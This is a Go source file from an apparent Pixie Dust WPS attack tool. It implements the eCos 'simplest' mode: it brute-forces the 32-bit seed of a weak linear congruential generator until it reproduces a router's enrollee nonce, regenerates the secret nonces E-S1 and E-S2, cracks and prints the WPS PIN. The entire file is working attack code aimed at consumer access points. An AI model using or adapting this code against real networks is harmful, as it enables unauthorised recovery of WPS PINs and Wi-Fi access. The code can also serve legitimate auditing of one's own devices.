/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package pixiedust

import (
	"fmt"
)



func (pda *pixieDustAttack) attackECOSSimplest() {
	if len(pda.eNonce) < wpsNonceLen { return }

    fmt.Println("[i] Trying eCos Simplest mode")
	sc := eCosSimplesSeedCrack{ pda : pda }

	if !sc.findSeed() {
		fmt.Println("Nonce doesn't appear to be generated by this mode, skipping...")
		return
	}

	pda.crackPin()

	if !pda.pinFound() {
		pda.nonceSeed  = 0
		pda.s1Seed     = 0
		pda.s2Seed     = 0
		pda.nonceMatch = eCosSimplest
		return
	}

	pda.displayPIN()
}



type eCosSimplesSeedCrack struct {
	pda   *pixieDustAttack
	seed   uint32
}



func (sc *eCosSimplesSeedCrack) ecosRandSimplest() byte {
    sc.seed = sc.seed * 1103515245 + 12345  // Permutate seed
    return byte(sc.seed)
}



func (sc *eCosSimplesSeedCrack) findSeed() bool {
	for index := uint32(0); ; index++ {
		sc.seed = index

		if sc.checkECOSSimplestSeed() {
			sc.pda.nonceSeed = index
			sc.generateSecrets()
			
			fmt.Printf("[$] Seed found: %d\n", sc.pda.nonceSeed)	
			return true
		}

		if index == 0xFFFFFFFF { 
			return false 
		}
	}
}



func (sc *eCosSimplesSeedCrack) checkECOSSimplestSeed() bool {
    for i := 0; i < wpsNonceLen; i++ {
        if sc.pda.eNonce[i] != sc.ecosRandSimplest() {
            return false
        }
    }

    return true
}



func (sc *eCosSimplesSeedCrack) generateSecrets() {
	sc.pda.s1Seed = sc.seed
	sc.pda.memAllocESecret1()
	for i := 0; i < wpsSecretNonceLen; i++ {
		sc.pda.eSecret1[i] = sc.ecosRandSimplest()
	}
	
	sc.pda.s2Seed = sc.seed
	sc.pda.memAllocESecret2()
	for i := 0; i < wpsSecretNonceLen; i++ {
	    sc.pda.eSecret2[i] = sc.ecosRandSimplest()
	}
}